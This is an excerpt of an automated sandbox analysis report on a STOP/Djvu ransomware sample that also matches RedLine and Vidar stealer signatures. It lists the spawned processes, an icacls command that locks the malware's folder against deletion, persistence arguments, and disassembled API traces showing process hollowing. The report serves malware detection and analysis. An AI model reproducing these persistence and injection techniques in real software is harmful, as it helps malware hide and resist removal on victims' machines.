                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:13:34:55
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:icacls "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                  Imagebase:0x9c0000
                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:13:34:55
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1259211978.0000000002191000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:13:34:56
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:13:34:57
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe --Task
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.1281218697.00000000021EC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 89%, ReversingLabs
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:13:34:58
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe --Task
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:14
                                                                                                                                                  Start time:13:35:04
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:367'104 bytes
                                                                                                                                                  MD5 hash:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.1337203091.0000000000613000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 38%, ReversingLabs
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:15
                                                                                                                                                  Start time:13:35:04
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:367'104 bytes
                                                                                                                                                  MD5 hash:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:16
                                                                                                                                                  Start time:13:35:07
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.1396092772.0000000000668000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:13:35:10
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:19
                                                                                                                                                  Start time:13:35:17
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000013.00000002.1480717664.0000000002220000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:20
                                                                                                                                                  Start time:13:35:18
                                                                                                                                                  Start date:11/01/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5 hash:9DE69C7A3E551DCBC9208221099680A7
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:1.1%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:20.3%
                                                                                                                                                    Signature Coverage:9.6%
                                                                                                                                                    Total number of Nodes:187
                                                                                                                                                    Total number of Limit Nodes:28
                                                                                                                                                    execution_graph 48746 401bd0 48792 404964 48746->48792 48748 401bdc GetStartupInfoW 48749 401bff 48748->48749 48793 40bed2 HeapCreate 48749->48793 48752 401c4f 48825 40bd41 76 API calls 8 library calls 48752->48825 48755 401c55 48756 401c61 __RTC_Initialize 48755->48756 48757 401c59 48755->48757 48795 40b572 72 API calls 3 library calls 48756->48795 48826 401b60 67 API calls 3 library calls 48757->48826 48759 401c60 48759->48756 48761 401c6e 48762 401c72 48761->48762 48763 401c7a GetCommandLineW 48761->48763 48827 40aa80 67 API calls 3 library calls 48762->48827 48796 40b515 GetEnvironmentStringsW 48763->48796 48766 401c79 48766->48763 48767 401c89 48828 40b467 68 API calls 2 library calls 48767->48828 48769 401c93 48770 401c97 48769->48770 48771 401c9f 48769->48771 48829 40aa80 67 API calls 3 library calls 48770->48829 48802 40b229 48771->48802 48775 401c9e 48775->48771 48776 401cb0 48815 40abb7 74 API calls 5 library calls 48776->48815 48777 401ca8 48830 40aa80 67 API calls 3 library calls 48777->48830 48780 401caf 48780->48776 48781 401cb6 48782 401cbb 48781->48782 48785 401cc2 __wwincmdln 48781->48785 48831 40aa80 67 API calls 3 library calls 48782->48831 48784 401cc1 48784->48785 48785->48784 48816 4ae94a 48785->48816 48792->48748 48794 401c43 48793->48794 48794->48752 48824 401b60 67 API calls 3 library calls 48794->48824 48795->48761 48797 40b526 48796->48797 48798 40b52a 48796->48798 48797->48767 48834 40dd16 48798->48834 48800 40b54b _setlocale 48801 40b552 FreeEnvironmentStringsW 48800->48801 48801->48767 48803 40b241 _wcslen 48802->48803 48807 401ca4 48802->48807 48867 40dd5b 48803->48867 48805 40b2ca 48875 40dc2c 67 API calls 7 library calls 48805->48875 48807->48776 48807->48777 48808 40dd5b __calloc_crt 67 API calls 48809 40b265 _wcslen 48808->48809 48809->48805 48809->48807 48809->48808 48810 40b2f0 48809->48810 48813 40b2af 48809->48813 48873 412d9d 67 API calls __dupenv_s_helper 48809->48873 48876 40dc2c 67 API calls 7 library calls 48810->48876 48813->48809 48874 402c7e 10 API calls 3 library calls 48813->48874 48815->48781 48817 4ae961 48816->48817 48818 4ae984 lstrcatA 48817->48818 48819 4ae9ae 48817->48819 48818->48817 48896 4ae482 48819->48896 48824->48752 48825->48755 48826->48759 48827->48766 48828->48769 48829->48775 48830->48780 48831->48784 48837 40dd1f 48834->48837 48836 40dd55 48836->48800 48837->48836 48838 40dd36 Sleep 48837->48838 48840 418bd2 48837->48840 48839 40dd4b 48838->48839 48839->48836 48839->48837 48841 418c85 48840->48841 48851 418be4 48840->48851 48865 40f2e2 6 API calls __decode_pointer 48841->48865 48843 418c8b 48866 402e68 67 API calls __getptd_noexit 48843->48866 48848 418c41 RtlAllocateHeap 48848->48851 48849 418bf5 48849->48851 48858 40aff5 67 API calls 2 library calls 48849->48858 48859 40ae24 67 API calls 7 library calls 48849->48859 48860 40aad4 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 48849->48860 48851->48848 48851->48849 48852 418c71 48851->48852 48855 418c76 48851->48855 48857 418c7d 48851->48857 48861 418b09 67 API calls 4 library calls 48851->48861 48862 40f2e2 6 API calls __decode_pointer 48851->48862 48863 402e68 67 API calls __getptd_noexit 48852->48863 48864 402e68 67 API calls __getptd_noexit 48855->48864 48857->48837 48858->48849 48859->48849 48861->48851 48862->48851 48863->48855 48864->48857 48865->48843 48866->48857 48870 40dd64 48867->48870 48869 40dda1 48869->48809 48870->48869 48871 40dd82 Sleep 48870->48871 48877 40468f 48870->48877 48872 40dd97 48871->48872 48872->48869 48872->48870 48873->48809 48874->48813 48875->48807 48876->48807 48878 40469b __calloc_impl 48877->48878 48879 4046b3 48878->48879 48889 4046d2 _memset 48878->48889 48890 402e68 67 API calls __getptd_noexit 48879->48890 48881 4046b8 48891 402de5 6 API calls 2 library calls 48881->48891 48883 404744 RtlAllocateHeap 48883->48889 48885 4046c8 __calloc_impl 48885->48870 48889->48883 48889->48885 48892 4077ef 67 API calls 2 library calls 48889->48892 48893 410044 5 API calls 2 library calls 48889->48893 48894 40478b LeaveCriticalSection _doexit 48889->48894 48895 40f2e2 6 API calls __decode_pointer 48889->48895 48890->48881 48892->48889 48893->48889 48894->48889 48895->48889 48897 4ae48f __write_nolock 48896->48897 48898 4ae4bb ChangeTimerQueueTimer 48897->48898 48899 4ae4cf GetLastError 48897->48899 48901 4ae502 48897->48901 48898->48899 48899->48897 48900 4ae4de 48899->48900 48900->48901 48904 4ae4e7 GetCompressedFileSizeA OpenFile 48900->48904 48902 4ae53e GetAtomNameA 48901->48902 48903 4ae601 48901->48903 48949 40e5f0 __VEC_memzero 48902->48949 48905 4ae79d 48903->48905 48907 4ae62b FreeLibraryAndExitThread SetConsoleTitleA LocalFree 48903->48907 48908 4ae64f 10 API calls 48903->48908 48904->48901 48943 4ae12b GlobalAlloc 48905->48943 48907->48908 48952 401458 67 API calls 2 library calls 48908->48952 48909 4ae566 SetDefaultCommConfigA CopyFileExW FreeEnvironmentStringsW GetModuleHandleA EnumDateFormatsExW 48912 4ae5ba DeleteCriticalSection 48909->48912 48913 4ae5c7 48909->48913 48912->48913 48915 4ae5d8 48913->48915 48916 4ae5d0 LoadLibraryW 48913->48916 48914 4ae6f7 48953 401375 103 API calls __vsprintf_l 48914->48953 48950 401145 103 API calls 3 library calls 48915->48950 48916->48915 48919 4ae81e 48944 4ae1ed LoadLibraryA 48919->48944 48920 4ae7a2 48920->48919 48921 4ae803 BuildCommDCBW VirtualUnlock 48920->48921 48921->48920 48923 4ae70d 48954 401458 67 API calls 2 library calls 48923->48954 48924 4ae5e7 48951 40100b 68 API calls __floor_pentium4 48924->48951 48926 4ae823 48945 4ae140 48926->48945 48928 4ae5f4 48928->48903 48930 4ae719 48955 40151e 69 API calls _vscanf 48930->48955 48932 4ae725 _memset 48956 4ae32b 101 API calls __vswprintf_c_l 48932->48956 48934 4ae76f 48957 401458 67 API calls 2 library calls 48934->48957 48935 4ae828 48936 4ae8d9 48935->48936 48938 4ae8a0 GetConsoleDisplayMode 48935->48938 48940 4ae8be SetFileAttributesA OpenWaitableTimerW 48935->48940 48936->48936 48938->48935 48939 4ae77b 48958 40171e 107 API calls 4 library calls 48939->48958 48940->48935 48942 4ae79c 48942->48905 48943->48920 48944->48926 48946 4ae148 48945->48946 48947 4ae154 LoadLibraryA VirtualProtect 48946->48947 48948 4ae1ea 48946->48948 48947->48946 48948->48935 48949->48909 48950->48924 48951->48928 48952->48914 48953->48923 48954->48930 48955->48932 48956->48934 48957->48939 48958->48942 48959 210a026 48960 210a035 48959->48960 48963 210a7c6 48960->48963 48964 210a7e1 48963->48964 48965 210a7ea CreateToolhelp32Snapshot 48964->48965 48966 210a806 Module32First 48964->48966 48965->48964 48965->48966 48967 210a815 48966->48967 48969 210a03e 48966->48969 48970 210a485 48967->48970 48971 210a4b0 48970->48971 48972 210a4c1 VirtualAlloc 48971->48972 48973 210a4f9 48971->48973 48972->48973 48973->48973 48974 2270000 48977 2270630 48974->48977 48976 2270005 48978 227064c 48977->48978 48980 2271577 48978->48980 48983 22705b0 48980->48983 48986 22705dc 48983->48986 48984 22705e2 GetFileAttributesA 48984->48986 48985 227061e 48986->48984 48986->48985 48988 2270420 48986->48988 48989 22704f3 48988->48989 48990 22704ff CreateWindowExA 48989->48990 48991 22704fa 48989->48991 48990->48991 48992 2270540 PostMessageA 48990->48992 48991->48986 48993 227055f 48992->48993 48993->48991 48995 2270110 VirtualAlloc GetModuleFileNameA 48993->48995 48996 2270414 48995->48996 48997 227017d CreateProcessA 48995->48997 48996->48993 48997->48996 48999 227025f VirtualFree VirtualAlloc Wow64GetThreadContext 48997->48999 48999->48996 49000 22702a9 ReadProcessMemory 48999->49000 49001 22702e5 VirtualAllocEx NtWriteVirtualMemory 49000->49001 49002 22702d5 NtUnmapViewOfSection 49000->49002 49005 227033b 49001->49005 49002->49001 49003 2270350 NtWriteVirtualMemory 49003->49005 49004 227039d WriteProcessMemory Wow64SetThreadContext ResumeThread 49006 22703fb ExitProcess 49004->49006 49005->49003 49005->49004

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 02270110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02270156
                                                                                                                                                    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0227016C
                                                                                                                                                    • CreateProcessA.KERNELBASE(?,00000000), ref: 02270255
                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02270270
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02270283
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0227029F
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022702C8
                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022702E3
                                                                                                                                                    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02270304
                                                                                                                                                    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0227032A
                                                                                                                                                    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02270399
                                                                                                                                                    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022703BF
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022703E1
                                                                                                                                                    • ResumeThread.KERNELBASE(00000000), ref: 022703ED
                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 02270412
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 93872480-0
                                                                                                                                                    • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                    • Instruction ID: 7849f1fb61b265aa0721bfdebacac34b58a233c6fa1d8f680b01fc548fb3e86c
                                                                                                                                                    • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                    • Instruction Fuzzy Hash: 6CB1D874A00209AFDB44CF98C895F9EBBB5FF88314F248158E908AB395D771AE45CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0210A7C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 153 210a7c6-210a7df 154 210a7e1-210a7e3 153->154 155 210a7e5 154->155 156 210a7ea-210a7f6 CreateToolhelp32Snapshot 154->156 155->156 157 210a806-210a813 Module32First 156->157 158 210a7f8-210a7fe 156->158 159 210a815-210a816 call 210a485 157->159 160 210a81c-210a824 157->160 158->157 165 210a800-210a804 158->165 163 210a81b 159->163 163->160 165->154 165->157
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0210A7EE
                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0210A80E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229632028.000000000210A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0210A000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_210a000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                    • Instruction ID: e6c3bb9ae33e6b728729f575ebd1e7158842b2751306c3c9a92fdcefb88b8df5
                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                    • Instruction Fuzzy Hash: 38F062352407106FD7203BB5A8CDB6E76E8AF49726F104639E742910C0DBF0E8468A65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE482 Relevance: 89.5, APIs: 39, Strings: 12, Instructions: 294timefilelibraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
